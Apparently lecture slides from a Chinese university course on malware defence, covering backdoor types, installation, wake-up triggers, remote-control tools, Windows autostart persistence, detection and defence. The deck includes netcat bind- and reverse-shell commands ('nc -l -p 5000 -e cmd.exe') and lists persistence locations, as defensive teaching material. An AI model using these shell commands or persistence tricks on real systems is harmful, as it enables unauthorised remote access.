后门是一个允许攻击者绕过系统中常规安全控制机制的程序-Read.PPTVIP

恶意软件（病毒）的分析与防范 Defence analysis of malware 计算机学院 傅建明 Fujms@ 后门 后门是一个允许攻击者绕过系统中常规安全控制机制的程序，他按照攻击者自己的意图提供通道。 后门的重点在于为攻击者提供进入目标计算机的通道。 后门的类型 本地权限的提升 对系统有访问权的攻击者变换其权限等级成为管理员，然后攻击者可以重新设置该系统或访问人和存储在系统中的文件。 单个命令的远程执行 攻击者可以向目标计算机发送消息。每次执行一个单独的命令，后门执行攻击者的命令并将输出返回给攻击者。 远程命令行解释器访问 正如远程Shell，这类后门允许攻击者通过网络快速直接地键入受害计算机的命令提示。其比“单个命令的远程执行”要强大得多。 远程控制GUI 攻击者可以看到目标计算机的GUI，控制鼠标的移动，输入对键盘的操作，这些都通过网络实现。 后门的安装 自己植入（物理接触或入侵之后） 通过病毒、蠕虫和恶意移动代码 欺骗受害者自己安装 Email 远程共享 BT下载 …… 后门举例 NetCat：通用的网络连接工具 用法一： nc –l –p 5000 –e cmd.exe nc 5000 用法二： nc –l –p 5000 nc 5000 –e cmd.exe cshell.exe 其他Windows下的后门程序 CryptCat Tini 提供通向Tcp端口7777，只有3K。 …… 无端口后门-如何唤醒 ICMP后门 不使用TCP/UDP协议。 使用ICMP协议进行通信。 难以检测。 非混合型探测后门攻击者将触发指令发送到对方计算机。 难以检测。(Cd00r: syn to port x, syn to port y, syn to port z) 混合型探测后门 只要攻击者将触发指令发送到对方网络中即可触发后门。 更加难以检测。 (syn to port x , syn to port x, syn to port x in different Ips) Bits--glacier 进程管理器中看不到 平时没有端口，只是在系统中充当卧底的角色 提供正向连接和反向连接两种功能 仅适用于Windows2000/XP/2003 具体用法和例子可以查看“难以觉察的后门--BITS”一文 GUI(Graphics User Interface)远程控制 并非所有的GUI远程控制都是恶意的 VNC(Virtual Network Computing) Windows Terminal Services PCAnywhere Back Orifice 2000 SubSeven VNC 英国剑桥大学ATT实验室在2002年开发的轻量型的远程控制计算机软件，任何人都可免费取得该软件。 VNC软件主要由两个部分组成： VNC server及VNC viewer。 VNC server 与 VNC viewer 支持多种操作系统，如 windows，Linux，MacOS 及 Unix 系列（Unix，Solaris等），因此可将 VNC server 及 VNC viewer 分别安装在不同的操作系统中进行控制。 也可以通过一般的网络浏览器（如 IE 等）来控制被控端（需要 Java 虚拟机的支持）。 后门的启动 感染普通执行文件或系统文件 添加程序到“开始”-“程序”-“启动”选项 修改系统配置文件win.ini、system.ini、wininit.ini、winstart.bat、autoexec.bat等的相关启动选项 通过修改注册表启动键值 修改文件关联的打开方式 添加计划任务 利用自定义文件夹风格 注册为Internet?Explorer的?BHO?(Browser?Helper?Object)组件 具体请参考“Windows的自启动方式 ”一文。 检测Windows后门启动技术 手工检测 注册表启动键值 启动选项 关联方式 计划任务 … 利用工具检测 Msconfig AutoRuns /Utilities/Autoruns.html 完整性检测程序（GFI LANguard System Integrity Monitor, Ionx Data Sentinel） AutoRuns的运行界面 如何防御后门 --普通后门 培养良好的安全意识和习惯。 使用网络防火墙封锁与端口的连接。 仅允许最少数量的端口通信通过防火墙 天网个人防火墙，瑞星防火墙，江民黑客防火墙，Zone Alarm，Norton Personal Firewall…… 经常利用端口扫描器扫描主机或端口查看工具查找本地端口监听程序。